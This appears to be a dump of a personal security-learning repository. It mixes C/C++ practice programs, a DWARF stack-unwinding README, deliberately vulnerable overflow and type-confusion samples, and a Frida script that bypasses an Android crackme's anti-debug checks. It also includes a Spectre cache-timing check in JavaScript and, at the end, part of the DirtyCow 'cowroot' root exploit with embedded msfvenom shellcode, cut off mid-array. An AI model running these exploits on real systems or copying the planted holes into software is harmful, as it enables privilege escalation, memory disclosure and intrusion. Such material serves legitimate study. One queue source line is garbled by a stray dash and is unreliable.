| // MADV_DONTNEED = 4 20 | // asm-generic/mman-common.h 21 | // 22 | 23 | char buf; 24 | while(read(ret, &buf, 1) > 0){ 25 | printf("%c", buf); 26 | } 27 | 28 | return 0; 29 | } 30 | -------------------------------------------------------------------------------- /clang/namespace.cc: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | template 6 | void test(T &v1){ 7 | std::cout << "Hello, World!" << std::endl; 8 | std::cout << v1 << std::endl; 9 | } 10 | namespace v8{ 11 | int root_v8 = 1683; 12 | } 13 | 14 | namespace _v8 { 15 | namespace v8 { 16 | int in_gv = 1337; 17 | } 18 | int out_gv = 7798; 19 | void tf(){ 20 | std::cout << v8::in_gv << std::endl; 21 | std::cout << ::v8::root_v8 << std::endl; 22 | std::cout << _v8::out_gv << std::endl; 23 | } 24 | } 25 | 26 | int main(int argc, char *argv[]){ 27 | std::cout << "main Function" << std::endl; 28 | _v8::tf(); 29 | test("aSiagaming"); 30 | return 0; 31 | } 32 | -------------------------------------------------------------------------------- /clang/null_dev.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | 6 | int main(int argc, char *argv[]){ 7 | int fd; 8 | char buff[1024]; 9 | int ret; 10 | fd = open("/dev/null", O_RDWR); 11 | ret = read(fd, buff, sizeof(buff)); 12 | printf("ret : %d\n", ret); 13 | strncpy(buff, "Hello", 5); 14 | ret = write(fd, buff, 5); 15 | printf("ret : %d\n", ret); 16 | ret = read(fd, buff, sizeof(buff)); 17 | printf("ret : %d\n", ret); 18 | close(fd); 19 | return 0; 20 | } 21 | -------------------------------------------------------------------------------- /clang/smart_point.cc: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | class bulb{ 6 | public: 7 | void turn_on(void) { status = "bulb on"; } 8 | void turn_off(void) { status = "bulb off"; } 9 | void print_state(void) { std::cout << status << std::endl; } 10 | 11 | private: 12 | std::string status; 13 | }; 14 | 15 | int main(int argc , char *argv[]){ 16 | /* 17 | bulb b1; 18 | b1.turn_on(); 19 | b1.print_state(); 20 | 21 | b1.turn_off(); 22 | b1.print_state(); 23 | */ 24 | 25 | /* 26 | bulb *pb = new bulb(); 27 | pb->turn_on(); 28 | pb->print_state(); 29 | 30 | pb->turn_off(); 31 | pb->print_state(); 32 | delete pb; 33 | */ 34 | 35 | /* 36 | std::unique_ptr pb = std::make_unique(); 37 | pb->turn_on(); 38 | pb->print_state(); 39 | 40 | pb->turn_off(); 41 | pb->print_state(); 42 | return 0; 43 | */ 44 | 45 | auto pb = std::make_unique(); 46 | pb->turn_on(); 47 | pb->print_state(); 48 | 49 | pb->turn_off(); 50 | pb->print_state(); 51 | 52 | return 0; 53 | } 54 | -------------------------------------------------------------------------------- /clang/template.cc: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | #define WARN_UNUSED_RESULT __attribute__((warn_unused_result)) 5 | 6 | template 7 | void get_type(T1 &_type){ 8 | T1 temp; 9 | temp = _type; 10 | std::cout << "SIZE : " << sizeof(temp) << std::endl; 11 | } 12 | 13 | template 14 | void get_types(T1 &t1, T2 &t2, T3 &t3){ 15 | T1 temp1; 16 | T2 temp2; 17 | T3 temp3; 18 | std::cout << "SIZE temp1 : " << sizeof(temp1) << std::endl; 19 | std::cout << "SIZE temp2 : " << sizeof(temp2) << std::endl; 20 | std::cout << "SIZE temp3 : " << sizeof(temp3) << std::endl; 21 | } 22 | 23 | class Interpreter{ 24 | public: 25 | virtual void foo(){ 26 | std::cout << "Virtual Test" << std::endl; 27 | } 28 | }; 29 | 30 | class child : public Interpreter{ 31 | public: 32 | void foo() override{ 33 | std::cout << "override done" << std::endl; 34 | } 35 | }; 36 | 37 | int main(int argc, char *argv[]){ 38 | //WARN_UNUSED_RESULT int unused; 39 | std::cout << "Hello World!" << std::endl; 40 | double v1; 41 | int v2; 42 | long v3; 43 | get_type(v1); 44 | get_type(v2); 45 | get_type(v3); 46 | 47 | get_types(v1, v2, v3); 48 | 49 | enum class eTest{ red, green }; 50 | 51 | 52 | child *c1 = new child; 53 | std::cout << c1 << std::endl; 54 | c1->foo(); 55 | 56 | return 0; 57 | } 58 | -------------------------------------------------------------------------------- /clang/type_casting.cc: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | class CBase{ 5 | public: 6 | int v1; 7 | }; 8 | 9 | class CDerived : public CBase{ 10 | public: 11 | int v2; 12 | }; 13 | 14 | 15 | int main(int argc, char *argv[]){ 16 | 17 | CBase *pBase = new CBase; 18 | CDerived *pDerived = new CDerived; 19 | pBase->v1 = 0xdeadbeef; 20 | 21 | pDerived->v1 = 0xdeadbeef; 22 | pDerived->v2 = 0xcafebabe; 23 | 24 | std::cout << pBase << std::endl; 25 | std::cout << pDerived << std::endl; 26 | std::cout << pBase->v1 << std::endl; 27 | std::cout << pDerived->v1 << std::endl; 28 | std::cout << pDerived->v2 << std::endl; 29 | 30 | CBase *confusion = new CDerived; // Isn't type-confusion case? 31 | std::cout << confusion << std::endl; // Why didn't warn some message? 32 | 33 | int v1 = 50; 34 | int *p1 = &v1; 35 | // char *p2 = p1; // Error ! ( Type mismatch ) 36 | // char *p2 = static_cast(p1); // Error ! ( Type mismatch ) 37 | char *p2 = reinterpret_cast(p1); // Only allow pointer type casting 38 | 39 | /* const_cast<>() is only used for const and reference type */ 40 | 41 | return 0; 42 | } 43 | -------------------------------------------------------------------------------- /clang/typedef.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | typedef void * Var; 5 | 6 | int main(int argc, char *argv[]){ 7 | Var test; 8 | test = malloc(0x50); 9 | printf("%p\n", test); 10 | free(test); 11 | return 0; 12 | } 13 | -------------------------------------------------------------------------------- /data-structure/stack_queue_list.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | 6 | typedef struct _node{ 7 | int value; 8 | struct _node *next; 9 | }node; 10 | 11 | typedef node *node_ptr; 12 | 13 | typedef struct Queue{ 14 | int q_count; 15 | node_ptr front; 16 | node_ptr rear; 17 | }queue; 18 | 19 | typedef struct Stack{ 20 | node_ptr top; 21 | }stack; 22 | 23 | void *init_stack(stack *_stack); 24 | void *insert_stack(stack *_stack); /* push */ 25 | void *delete_stack(stack *_stack); /* pop */ 26 | void *show_stack(stack *_stack); 27 | 28 | void *init_queue(queue *_queue); 29 | void *insert_queue(queue *_queue); 30 | void *delete_queue(queue *_queue); 31 | void *show_queue(queue *_queue); 32 | 33 | void menu(){ 34 | printf("-----------Menu------------\n"); 35 | puts("1. insert stack"); 36 | puts("2. insert queue"); 37 | puts("3. delete stack"); 38 | puts("4. delete queue"); 39 | puts("5. show stack"); 40 | puts("6. show queue"); 41 | puts("7. exit"); 42 | } 43 | 44 | int main(int argc, char *argv[]){ 45 | stack user_stack; 46 | queue user_queue; 47 | int user_choice; 48 | 49 | init_stack(&user_stack); 50 | init_queue(&user_queue); 51 | 52 | while(1){ 53 | menu(); 54 | printf("Your choice : "); 55 | scanf("%d", &user_choice); 56 | switch(user_choice){ 57 | case 1: 58 | insert_stack(&user_stack); 59 | break; 60 | case 2: 61 | insert_queue(&user_queue); 62 | break; 63 | case 3: 64 | delete_stack(&user_stack); 65 | break; 66 | case 4: 67 | delete_queue(&user_queue); 68 | break; 69 | case 5: 70 | show_stack(&user_stack); 71 | break; 72 | case 6: 73 | show_queue(&user_queue); 74 | break; 75 | case 7: 76 | exit(0); 77 | break; 78 | default: 79 | puts("Invalid choice"); 80 | break; 81 | } 82 | } 83 | } 84 | 85 | void *init_stack(stack *_stack){ 86 | _stack->top = NULL; 87 | } 88 | 89 | void *init_queue(queue *_queue){ 90 | _queue->q_count = 0; 91 | _queue->front = NULL; 92 | } 93 | 94 | void *insert_stack(stack *_stack){ 95 | node_ptr now = malloc(sizeof(node)); 96 | printf("data : "); 97 | scanf("%d", &now->value); 98 | now->next = _stack->top; /* actually prev */ 99 | _stack->top = now; 100 | } 101 | 102 | void *delete_stack(stack *_stack){ 103 | node_ptr prev; 104 | prev = _stack->top->next; 105 | memset(_stack->top, 0, sizeof(node)); 106 | free(_stack->top); 107 | _stack->top = prev; 108 | } 109 | 110 | void *show_stack(stack *_stack){ 111 | if( _stack->top == NULL ){ 112 | puts("Insert data first !!"); 113 | return 0; 114 | } 115 | node_ptr now; 116 | now = _stack->top; 117 | while( now != NULL ){ 118 | printf("data : %d\n", now->value); 119 | now = now->next; 120 | } 121 | } 122 | 123 | void *insert_queue(queue *_queue){ 124 | node_ptr now; 125 | now = malloc(sizeof(node)); 126 | printf("data : "); 127 | scanf("%d", &now->value); 128 | if( _queue->q_count++ == 0 ){ 129 | _queue->front = now; 130 | _queue->rear = now; 131 | } 132 | else{ 133 | _queue->rear->next = now; 134 | _queue->rear = now; 135 | } 136 | } 137 | 138 | 139 | void *delete_queue(queue *_queue){ 140 | node_ptr save; 141 | save = _queue->front->next; 142 | free(_queue->front); 143 | _queue->front = save; 144 | _queue->q_count—; 145 | } 146 | void *show_queue(queue *_queue){ 147 | node_ptr now; 148 | now = _queue->front; 149 | if( now == NULL ){ 150 | printf("Insert data first !!\n"); 151 | return 0; 152 | } 153 | while( now != NULL ){ 154 | printf("data : %d\n", now->value); 155 | now = now->next; 156 | } 157 | } 158 | -------------------------------------------------------------------------------- /dwarf/README.md: -------------------------------------------------------------------------------- 1 | # DWARF INFORMATION 2 | **what is dwarf?** 3 | - `Debugging With Attributed Record Formats` 4 | - Used to stack unwinding in c/c++ 5 | 6 | **what is stack unwind?** 7 | - Let's take an example. 8 | ``` 9 | #include 10 | #include 11 | 12 | using namespace std; 13 | 14 | void f3(void){ 15 | throw 10; 16 | } 17 | 18 | void f2(void){ 19 | f3(); 20 | } 21 | 22 | void f1(void){ 23 | f2(); 24 | } 25 | 26 | int main(void){ 27 | try{ 28 | f1(); 29 | } 30 | catch(int e){ 31 | printf("got exception : %d\n", e); 32 | } 33 | } 34 | ``` 35 | 36 | - If i throw some value, it backtrace stack frame, find last catch statement. 37 | - In above example code, throw statement is in the f3(). 38 | - Function flow is main() -> f1() -> f2() -> f3(). 39 | - So, catch statement is not defined in f3(), f2() and f1(), it has to backtrace from f3() to main(). 40 | - To successfully backtrace, DWARF information is needed, which placed in .eh_frame section or .debug_frame section. 41 | 42 | **CFI? CIE? FDE?** 43 | - CFI is Call Frame Information, which is information to stack backtrace( stack unwind ). 44 | - CFI record information about stack frame on special section( .eh_frame ) in each function. 45 | - In CFI, CFA ( Canocical Frame Address ) is used to represent current function start frame pointer. 46 | ``` 47 | .cfi_def_cfa 48 | .cfi_def_cfa_register 49 | .cfi_def_cfa_offset 50 | .cfi_offset 51 | ``` 52 | - CIE set CFA's initial rule. 53 | - FDE record some change in CFI in each function. 54 | - Each CFI record contains a Common Information Entry (CIE) record followed by 1 or more Frame Description Entry (FDE) records 55 | - DWARF uses a data structure called a Debugging Information Entry (DIE) to represent each variable, type, procedure, etc. 56 | 57 | ``` 58 | main: 59 | .LFB1024: 60 | .cfi_startproc 61 | .cfi_personality 0x3,__gxx_personality_v0 62 | .cfi_lsda 0x3,.LLSDA1024 63 | pushq %rbp 64 | .cfi_def_cfa_offset 16 65 | .cfi_offset 6, -16 66 | movq %rsp, %rbp 67 | .cfi_def_cfa_register 6 68 | pushq %rbx 69 | subq $24, %rsp 70 | .cfi_offset 3, -24 71 | .LEHB0: 72 | call _Z2f1v 73 | .LEHE0: 74 | .L9: 75 | movl $0, %eax 76 | jmp .L13 77 | .L11: 78 | cmpq $1, %rdx 79 | je .L8 80 | movq %rax, %rdi 81 | .LEHB1: 82 | call _Unwind_Resume 83 | .LEHE1: 84 | .L8: 85 | movq %rax, %rdi 86 | call __cxa_begin_catch 87 | movl (%rax), %eax 88 | movl %eax, -20(%rbp) 89 | movl -20(%rbp), %eax 90 | movl %eax, %esi 91 | movl $.LC0, %edi 92 | movl $0, %eax 93 | .LEHB2: 94 | call printf 95 | .LEHE2: 96 | call __cxa_end_catch 97 | jmp .L9 98 | .L12: 99 | movq %rax, %rbx 100 | call __cxa_end_catch 101 | movq %rbx, %rax 102 | movq %rax, %rdi 103 | .LEHB3: 104 | call _Unwind_Resume 105 | .LEHE3: 106 | .L13: 107 | addq $24, %rsp 108 | popq %rbx 109 | popq %rbp 110 | .cfi_def_cfa 7, 8 111 | ret 112 | .cfi_endproc 113 | ``` 114 | - Every function start with .cfi_startproc and end with .cfi_endproc 115 | -------------------------------------------------------------------------------- /exploit/struct_overflow.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | struct vuln{ 6 | char name[0x20]; 7 | int age; 8 | }; 9 | 10 | void pwn(int size, struct vuln *_target){ 11 | if( size > 0x20 ){ 12 | printf("Out-Of-Memory\n"); 13 | exit(-1); 14 | } 15 | printf("What's your name?\n"); 16 | read(0, _target->name, size); 17 | printf("Your Age?\n"); 18 | scanf("%d", &_target->age); 19 | } 20 | 21 | int main(int argc, char *argv[]){ 22 | setvbuf(stdin, 0, 2, 0); 23 | setvbuf(stdout, 0, 2, 0); 24 | setvbuf(stderr, 0, 2, 0); 25 | printf("OOB Sample\n"); 26 | struct vuln *target = malloc(sizeof(struct vuln)); 27 | int size; 28 | printf("How much size of your name length?\n"); 29 | scanf("%d", &size); 30 | pwn(size, target); 31 | 32 | return 0; 33 | } 34 | -------------------------------------------------------------------------------- /exploit/type-confusion0.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | struct target{ 5 | void (*fp)(void); 6 | int age; 7 | }; 8 | 9 | struct base{ 10 | char *name; 11 | int age; 12 | }; 13 | 14 | void get_shell(void){ 15 | system("/bin/sh"); 16 | } 17 | 18 | int main(int argc, char *argv[]){ 19 | struct base *Bbase = malloc(sizeof(struct base)); 20 | Bbase->name = (void *)get_shell; 21 | Bbase->age = 24; 22 | printf("%#lx\n", Bbase->name); 23 | 24 | // Type-Confusion Trigger 25 | 26 | ((struct target *)Bbase)->fp(); 27 | return 0; 28 | } 29 | -------------------------------------------------------------------------------- /exploit/type-confusion1.cc: -------------------------------------------------------------------------------- 1 | // Fedora 20 x64: gcc ./confused.cc -lstdc++ 2 | #include 3 | 4 | class IShouldRunCalculator { public: virtual bool UWannaRun() = 0; }; 5 | 6 | class CalculatorDecider final : public IShouldRunCalculator { 7 | public: 8 | CalculatorDecider() : m_run(false) {} 9 | virtual bool UWannaRun() { return m_run; } 10 | private: bool m_run; 11 | }; 12 | 13 | class DelegatingCalculatorDecider final : public IShouldRunCalculator { 14 | public: 15 | DelegatingCalculatorDecider(IShouldRunCalculator* delegate) : m_delegate(delegate) {} 16 | virtual bool UWannaRun() { return m_delegate->UWannaRun(); } 17 | private: IShouldRunCalculator* m_delegate; 18 | }; 19 | 20 | int main() { 21 | CalculatorDecider nonono; 22 | DelegatingCalculatorDecider isaidno(&nonono); 23 | IShouldRunCalculator* decider = &isaidno; 24 | CalculatorDecider* confused_decider = reinterpret_cast(decider); 25 | if (confused_decider->UWannaRun()) execl("/bin/gnome-calculator", 0); 26 | } 27 | -------------------------------------------------------------------------------- /javascript/README.md: -------------------------------------------------------------------------------- 1 | # Google Chrome 2 | ... 3 | 4 | # IE Edge 5 | ... 6 | 7 | # Mozila Firefox 8 | ... 9 | -------------------------------------------------------------------------------- /javascript/frida_hook.js: -------------------------------------------------------------------------------- 1 | var gb_offset = 0x71f0 2 | /* 3 | Java.perform(function () { 4 | send("java.lang.System.exit() Hooking process"); 5 | 6 | var sys = Java.use("java.lang.System"); 7 | sys.exit.overload("int").implementation = function(var_0) { 8 | send("java.lang.System.exit() is hooked..."); 9 | }; 10 | 11 | send("exit Done"); 12 | }); 13 | */ 14 | /* 15 | Interceptor.attach(Module.findExportByName("libc.so", "strstr"), { 16 | 17 | onEnter: function (args) { 18 | send("strstr hook process"); 19 | this.dbi = 0; 20 | var tmp = Memory.readUtf8String(args[0]); 21 | var target = Memory.readUtf8String(args[1]); 22 | if( tmp.indexOf("frida") != -1 || tmp.indexOf("xposed") != -1 ){ 23 | send(tmp + " : " + target); 24 | this.dbi = 1; 25 | } 26 | }, 27 | 28 | onLeave: function (retval) { 29 | if( this.dbi == 1 ){ 30 | send("Default : " + retval + " -> 0"); 31 | retval.replace(0); 32 | } 33 | return 0; 34 | } 35 | }); 36 | */ 37 | Interceptor.attach(Module.findExportByName("libc.so", "strstr"), { 38 | 39 | onEnter: function (args) { 40 | 41 | this.haystack = args[0]; 42 | this.needle = args[1]; 43 | this.frida = Boolean(0); 44 | 45 | haystack = Memory.readUtf8String(this.haystack); 46 | needle = Memory.readUtf8String(this.needle); 47 | 48 | if ( haystack.indexOf("frida") != -1 || haystack.indexOf("xposed") != -1 ) { 49 | //console.log(haystack + " : " + needle); 50 | this.frida = Boolean(1); 51 | } 52 | }, 53 | 54 | onLeave: function (retval) { 55 | 56 | if (this.frida) { 57 | //send("strstr(frida) was patched!! :) " + haystack); 58 | retval.replace(0); 59 | } 60 | 61 | return retval; 62 | } 63 | }); 64 | /* 65 | Interceptor.attach(Module.findExportByName("libc.so", "fork"), { 66 | onEnter: function(args){ 67 | console.log("fork exploit"); 68 | }, 69 | onLeave: function(result){ 70 | result.replace(0); 71 | return result; 72 | } 73 | }); 74 | 75 | var p_raise = Module.findExportByName("libc.so", "fork"); 76 | var raise = new NativeFunction(p_raise, 'int', ['void']); 77 | Interceptor.replace(p_raise, new NativeCallback(function (stat) { 78 | send("raise is replaced..."); 79 | return 0; 80 | }, 'int', ['void'])); 81 | 82 | var p_exit = Module.findExportByName("libc.so", "_exit"); 83 | var exit = new NativeFunction(p_exit, 'void', ['int']); 84 | Interceptor.replace(p_exit, new NativeCallback(function (stat) { 85 | send("_exit is hooked..."); 86 | }, 'void', ['int'])); 87 | */ 88 | var offset_anti_debug_x64 = 0x000075f0; 89 | var offset_protect_secret64 = 0x0000779c; 90 | var offset_strncmp_xor64 = 0x000077ec; 91 | 92 | function do_hook(){ 93 | 94 | var p_foo = Module.findBaseAddress("libfoo.so"); 95 | if (!p_foo) { 96 | send("p_foo is null (libfoo.so). Returning now..."); 97 | return 0; 98 | } 99 | var p_protect_secret = p_foo.add(offset_protect_secret64); 100 | var p_strncmp_xor64 = p_foo.add(offset_strncmp_xor64); 101 | send("libfoo.so @ " + p_foo.toString()); 102 | send("ptr_protect_secret @ " + p_protect_secret.toString()); 103 | send("ptr_strncmp_xor64 @ " + p_strncmp_xor64.toString()); 104 | 105 | 106 | Interceptor.attach( p_protect_secret, { 107 | onEnter: function (args) { 108 | send("onEnter() p_protect_secret"); 109 | send("args[0]: " + args[0]); 110 | }, 111 | 112 | onLeave: function (retval) { 113 | send("onLeave() p_protect_secret"); 114 | } 115 | }); 116 | 117 | Interceptor.attach( p_strncmp_xor64, { 118 | onEnter: function (args) { 119 | send("onEnter() p_strncmp_xor64"); 120 | send("args[0]: " + args[0]); 121 | send(hexdump(args[0], { 122 | offset: 0, 123 | length: 24, 124 | header: false, 125 | ansi: true 126 | })); 127 | 128 | send("args[1]: " + args[1]); 129 | var secret = hexdump(args[1], { 130 | offset: 0, 131 | length: 24, 132 | header: false, 133 | ansi: true 134 | }) 135 | send(secret); 136 | }, 137 | 138 | onLeave: function (retval) { 139 | send("onLeave() p_strncmp_xor64"); 140 | send(retval); 141 | } 142 | }); 143 | } 144 | /* 145 | var p_raise = Module.findExportByName("libc.so", "raise"); 146 | var raise = new NativeFunction( p_raise, "int", ["int"]); 147 | Interceptor.replace( p_raise, new NativeCallback(function ( stat ){ 148 | if( stat == 6 ){ 149 | send("raise(6) is triggered..."); 150 | } 151 | send("raise hook"); 152 | }, "int", ["int"])); 153 | */ 154 | 155 | var p_pthread_create = Module.findExportByName("libc.so", "pthread_create"); 156 | var pthread_create = new NativeFunction( p_pthread_create, "int", ["pointer", "pointer", "pointer", "pointer"]); 157 | send("NativeFunction pthread_create() replaced @ " + pthread_create); 158 | 159 | Interceptor.replace( p_pthread_create, new NativeCallback(function (ptr0, ptr1, ptr2, ptr3) { 160 | send("pthread_create() overloaded"); 161 | var ret = ptr(0); 162 | if (ptr1.isNull() && ptr3.isNull()) { 163 | send("loading fake pthread_create because ptr1 and ptr3 are equal to 0!"); 164 | } else { 165 | send("loading real pthread_create()"); 166 | ret = pthread_create(ptr0,ptr1,ptr2,ptr3); 167 | } 168 | 169 | do_hook(); 170 | 171 | send("ret: " + ret); 172 | 173 | }, "int", ["pointer", "pointer", "pointer", "pointer"])); 174 | 175 | Java.perform(function () { 176 | send("java.lang.System.exit() Hooking process"); 177 | 178 | var sys = Java.use("java.lang.System"); 179 | sys.exit.overload("int").implementation = function(var_0) { 180 | send("java.lang.System.exit() is hooked..."); 181 | }; 182 | 183 | send("exit Done"); 184 | }); 185 | 186 | Java.perform(function (){ 187 | var target = Java.use("sg.vantagepoint.uncrackable3.MainActivity"); 188 | target.verifyLibs.implementation = function(){ 189 | send("verifyLibs is hooked"); 190 | }; 191 | send("verifyLibs Done"); 192 | }); 193 | -------------------------------------------------------------------------------- /javascript/tencent_check.js: -------------------------------------------------------------------------------- 1 | /* 2 | * check.js - Spectre Check 3 | * 4 | * Copyright 2018 Tencent Xuanwu Lab 5 | * Copyright 2018 Tencent, Inc. and/or its affiliates. All rights reserved. 6 | * 7 | * This code is the copyright of all authors, please reference reservation reproduced. 8 | */ 9 | 10 | 11 | function asmModule(stdlib,forgein,heap) 12 | { 13 | 'use asm' 14 | var simpleByteArray = new stdlib.Uint8Array(heap); 15 | var probeTable = new stdlib.Uint8Array(heap); 16 | var TABLE1_STRIDE = 0x1000; 17 | var TABLE1_BYTES = 0x2000000; 18 | var junk = 0; 19 | var simpleByteArrayLength = 16; 20 | var sizeArrayStart = 0x1000000; 21 | 22 | function init() 23 | { 24 | var i =0; 25 | var j =0; 26 | for(i=0; (i|0)<16; i=(i+1)|0 ) 27 | simpleByteArray[i|0] = ((i|0)+1)|0; 28 | for(i=0; (i|0)<30; i=(i+1)|0 ) 29 | { 30 | j = ((((i|0)*8192)|0) + 0x1000000)|0 31 | simpleByteArray[(j|0)] = 0x10; 32 | } 33 | } 34 | 35 | function vul_call(index, sIndex) 36 | { 37 | index = index |0; 38 | sIndex = sIndex |0; 39 | var arr_size = 0; 40 | var j = 0; 41 | junk = probeTable[0]|0; 42 | j = ((((sIndex|0)*8192)|0) + 0x1000000)|0; 43 | arr_size = simpleByteArray[(j|0)]|0; 44 | if ((index|0) < (arr_size|0)) 45 | { 46 | index = simpleByteArray[index|0]|0; 47 | index = ((index * 0x1000)|0); 48 | junk = (junk ^ (probeTable[index]|0))|0; 49 | } 50 | } 51 | 52 | function flush() 53 | { 54 | var i =0; 55 | var current = 0; 56 | for (i = 256; (i|0) < 16640; i=(i+1)|0 ) 57 | current = probeTable[((i|0) * 512)|0]|0; 58 | } 59 | return { vul_call: vul_call ,init: init, flush:flush} 60 | } 61 | 62 | 63 | 64 | function check(num, data_array) 65 | { 66 | function now() { return Atomics.load(sharedArray, 0) } 67 | function reset() { Atomics.store(sharedArray, 0, 0) } 68 | function start() { reset(); return now(); } 69 | function clflush(size) 70 | { 71 | for (var i = 0; i < ((size) / offset); i++) 72 | current = evictionView.getUint32(i * offset); 73 | } 74 | 75 | const worker = new Worker('/special/spectre/js/worker.js'); 76 | 77 | const sharedBuffer = new SharedArrayBuffer(10 * Uint32Array.BYTES_PER_ELEMENT); 78 | const sharedArray = new Uint32Array(sharedBuffer); 79 | worker.postMessage(sharedBuffer); 80 | 81 | var simpleByteArrayLength = 16; 82 | var TABLE1_STRIDE = 0x1000; 83 | var TABLE1_BYTES = 0x3000000; 84 | var CACHE_HIT_THRESHOLD = 0 85 | var probeTable = new Uint8Array(TABLE1_BYTES); 86 | 87 | var offset = 64; 88 | var current; 89 | var cache_size = num * 1024 * 1024; 90 | var evictionBuffer = new ArrayBuffer(cache_size); 91 | var evictionView = new DataView(evictionBuffer); 92 | clflush(cache_size); 93 | 94 | var asm = asmModule(this,{},probeTable.buffer) 95 | var cnt =0; 96 | 97 | worker.onmessage = function(msg) 98 | { 99 | function readMemoryByte(malicious_x) 100 | { 101 | var results = new Uint32Array(257); 102 | var simpleByteArray = new Uint8Array(probeTable.buffer); 103 | var tries =0 104 | var junk = 0; 105 | var j = -1; 106 | var k = -1; 107 | for (tries = 99; tries > 0; tries--) 108 | { 109 | var training_x = tries % simpleByteArrayLength; 110 | clflush(cache_size); 111 | var time3 = start(); 112 | junk = simpleByteArray[0]; 113 | var time4 = now(); 114 | 115 | for (var j = 29; j >= 0; j--) 116 | { 117 | for ( var z = 0; z < 100; z++) {} 118 | var x = ((j % 6) - 1) & ~0xFFFF; 119 | x = (x | (x >> 16)); 120 | x = training_x ^ (x & (malicious_x ^ training_x)); 121 | asm.vul_call(x,j); 122 | } 123 | 124 | for (var i = 0; i < 256; i++) 125 | { 126 | var mix_i = i; 127 | var timeS = start(); 128 | junk = probeTable[(mix_i * TABLE1_STRIDE)]; 129 | timeE = now(); 130 | if (timeE-timeS <= CACHE_HIT_THRESHOLD && mix_i != simpleByteArray[tries % simpleByteArrayLength]) 131 | results[mix_i]++; 132 | } 133 | 134 | for (var i = 0; i<256; i++) 135 | { 136 | if (j<0 || results[i] >= results[j]) 137 | { 138 | k = j; 139 | j = i; 140 | } 141 | else if (k < 0 || results[i] >= results[k]) 142 | k = i; 143 | } 144 | if (results[j] >= (2 * results[k] + 5) || (results[j] == 2 && results[k] == 0)) 145 | break; 146 | } 147 | 148 | results[256] ^= junk; 149 | return [j,k,results[j],results[k]] 150 | } 151 | 152 | function readMemoryByteWrapper(malicious_x) 153 | { 154 | var rlt = readMemoryByte(malicious_x); 155 | 156 | if(rlt[0] != 0) 157 | { 158 | return rlt[0] 159 | } 160 | else 161 | { 162 | clflush(cache_size); 163 | var com_rlt = readMemoryByte(malicious_x); 164 | if (com_rlt[1] == rlt[1] || com_rlt[0] == rlt[1]) 165 | return rlt[1] 166 | else if (com_rlt[0] == 0 || com_rlt[1] == 0) 167 | return com_rlt[0] 168 | else 169 | { 170 | return -1; 171 | } 172 | } 173 | } 174 | 175 | asm.init(); 176 | for(var i=0 ;i<0x1000;i++) 177 | { 178 | asm.vul_call(1,0); 179 | clflush(64); 180 | } 181 | 182 | var simpleByteArray = new Uint8Array(probeTable.buffer); 183 | for(var i=0;i /proc/sys/vm/dirty_writeback_centisecs" may make the system more stable. 4 | * 5 | * (un)comment correct payload first (x86 or x64)! 6 | * 7 | * $ gcc cowroot.c -o cowroot -pthread 8 | * $ ./cowroot 9 | * DirtyCow root privilege escalation 10 | * Backing up /usr/bin/passwd.. to /tmp/bak 11 | * Size of binary: 57048 12 | * Racing, this may take a while.. 13 | * /usr/bin/passwd is overwritten 14 | * Popping root shell. 15 | * Don't forget to restore /tmp/bak 16 | * thread stopped 17 | * thread stopped 18 | * root@box:/root/cow# id 19 | * uid=0(root) gid=1000(foo) groups=1000(foo) 20 | */ 21 | 22 | #include 23 | #include 24 | #include 25 | #include 26 | #include 27 | #include 28 | #include 29 | 30 | void *map; 31 | int f; 32 | int stop = 0; 33 | struct stat st; 34 | char *name; 35 | pthread_t pth1,pth2,pth3; 36 | 37 | // change if no permissions to read 38 | char suid_binary[] = "/usr/bin/passwd"; 39 | 40 | /* 41 | * $ msfvenom -p linux/x64/exec CMD=/bin/bash PrependSetuid=True -f elf | xxd -i 42 | */ 43 | unsigned char sc[] = { 44 | 0x7f, 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 45 | 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x3e, 0x00, 0x01, 0x00, 0x00, 0x00, 46 | 0x78, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 47 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 48 | 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x38, 0x00, 0x01, 0x00, 0x00, 0x00, 49 | 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x07, 0x00, 0x00, 0x00, 50 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 51 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 52 | 0xb1, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xea, 0x00, 0x00, 0x00, 53 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 54 | 0x48, 0x31, 0xff, 0x6a, 0x69, 0x58, 0x0f, 0x05, 0x6a, 0x3b, 0x58, 0x99, 55 | 0x48, 0xbb, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x73, 0x68, 0x00, 0x53, 0x48, 56 | 0x89, 0xe7, 0x68, 0x2d, 0x63, 0x00, 0x00, 0x48, 0x89, 0xe6, 0x52, 0xe8, 57 | 0x0a, 0x00, 0x00, 0x00, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x62, 0x61, 0x73, 58 | 0x68, 0x00, 0x56, 0x57, 0x48, 0x89, 0xe6, 0x0f, 0x05 59 | }; 60 | unsigned int sc_len = 177; 61 | 62 | /* 63 | * $ msfvenom -p linux/x86/exec CMD=/bin/bash PrependSetuid=True -f elf | xxd -i 64 | unsigned char sc[] = { 65 | 0x7f, 0x45, 0x4c, 0x46, 0x01, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 66 | 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x03, 0x00, 0x01, 0x00, 0x00, 